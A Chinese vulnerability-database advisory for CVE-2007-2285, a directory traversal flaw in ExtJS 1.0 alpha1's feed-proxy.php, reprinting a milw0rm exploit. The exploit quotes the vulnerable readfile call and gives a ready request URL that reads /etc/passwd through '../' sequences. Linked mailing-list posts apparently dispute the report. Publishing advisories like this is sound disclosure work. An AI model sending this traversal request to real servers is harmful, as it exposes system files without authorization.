Jack Slocum Ext 'Feed-Proxy.PHP' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112798 漏洞类型 路径遍历
发布时间 2007-04-25 更新时间 2007-04-27
CVE编号 CVE-2007-2285 CNNVD-ID CNNVD-200704-528
漏洞平台 PHP CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/3800
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-528
|漏洞详情
JackSlocumExt(ExtJS)的examples/layout/feed-proxy.php中存在目录遍历漏洞。远程攻击者可以借助feed参数中的..,读取任意文件。
|漏洞EXP
#  ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
# D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com
# V.Code In /examples/layout/feed-proxy.php

----------------------------------------------------------

header('Content-Type: text/xml');
       readfile($feed);
       return;
}
?>

----------------------------------------------------------

# Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../../etc/passwd

# Greetz To: AsbMay's Group & City Of Ghost Team

# milw0rm.com [2007-04-25]
|参考资料

来源:BID
名称:23643
链接:http://www.securityfocus.com/bid/23643
来源:MILW0RM
名称:3800
链接:http://www.milw0rm.com/exploits/3800
来源:OSVDB
名称:35561
链接:http://osvdb.org/35561
来源:VIM
名称:20070426re:False:ext1.0alpha1(feed-proxy.php)RemoteFileDisclosure
链接:http://attrition.org/pipermail/vim/2007-April/001549.html
来源:VIM
名称:20070426Re:False:ext1.0alpha1(feed-proxy.php)RemoteFileDisclosure
链接:http://attrition.org/pipermail/vim/2007-April/001546.html
来源:VIM
名称:20070426False:ext1.0alpha1(feed-proxy.php)RemoteFileDisclosure
链接:http://attrition.org/pipermail/vim/2007-April/001545.html
来源:XF
名称:ext-feedproxy-directory-traversal(33864)
链接:http://xforce.iss.net/xforce/xfdb/33864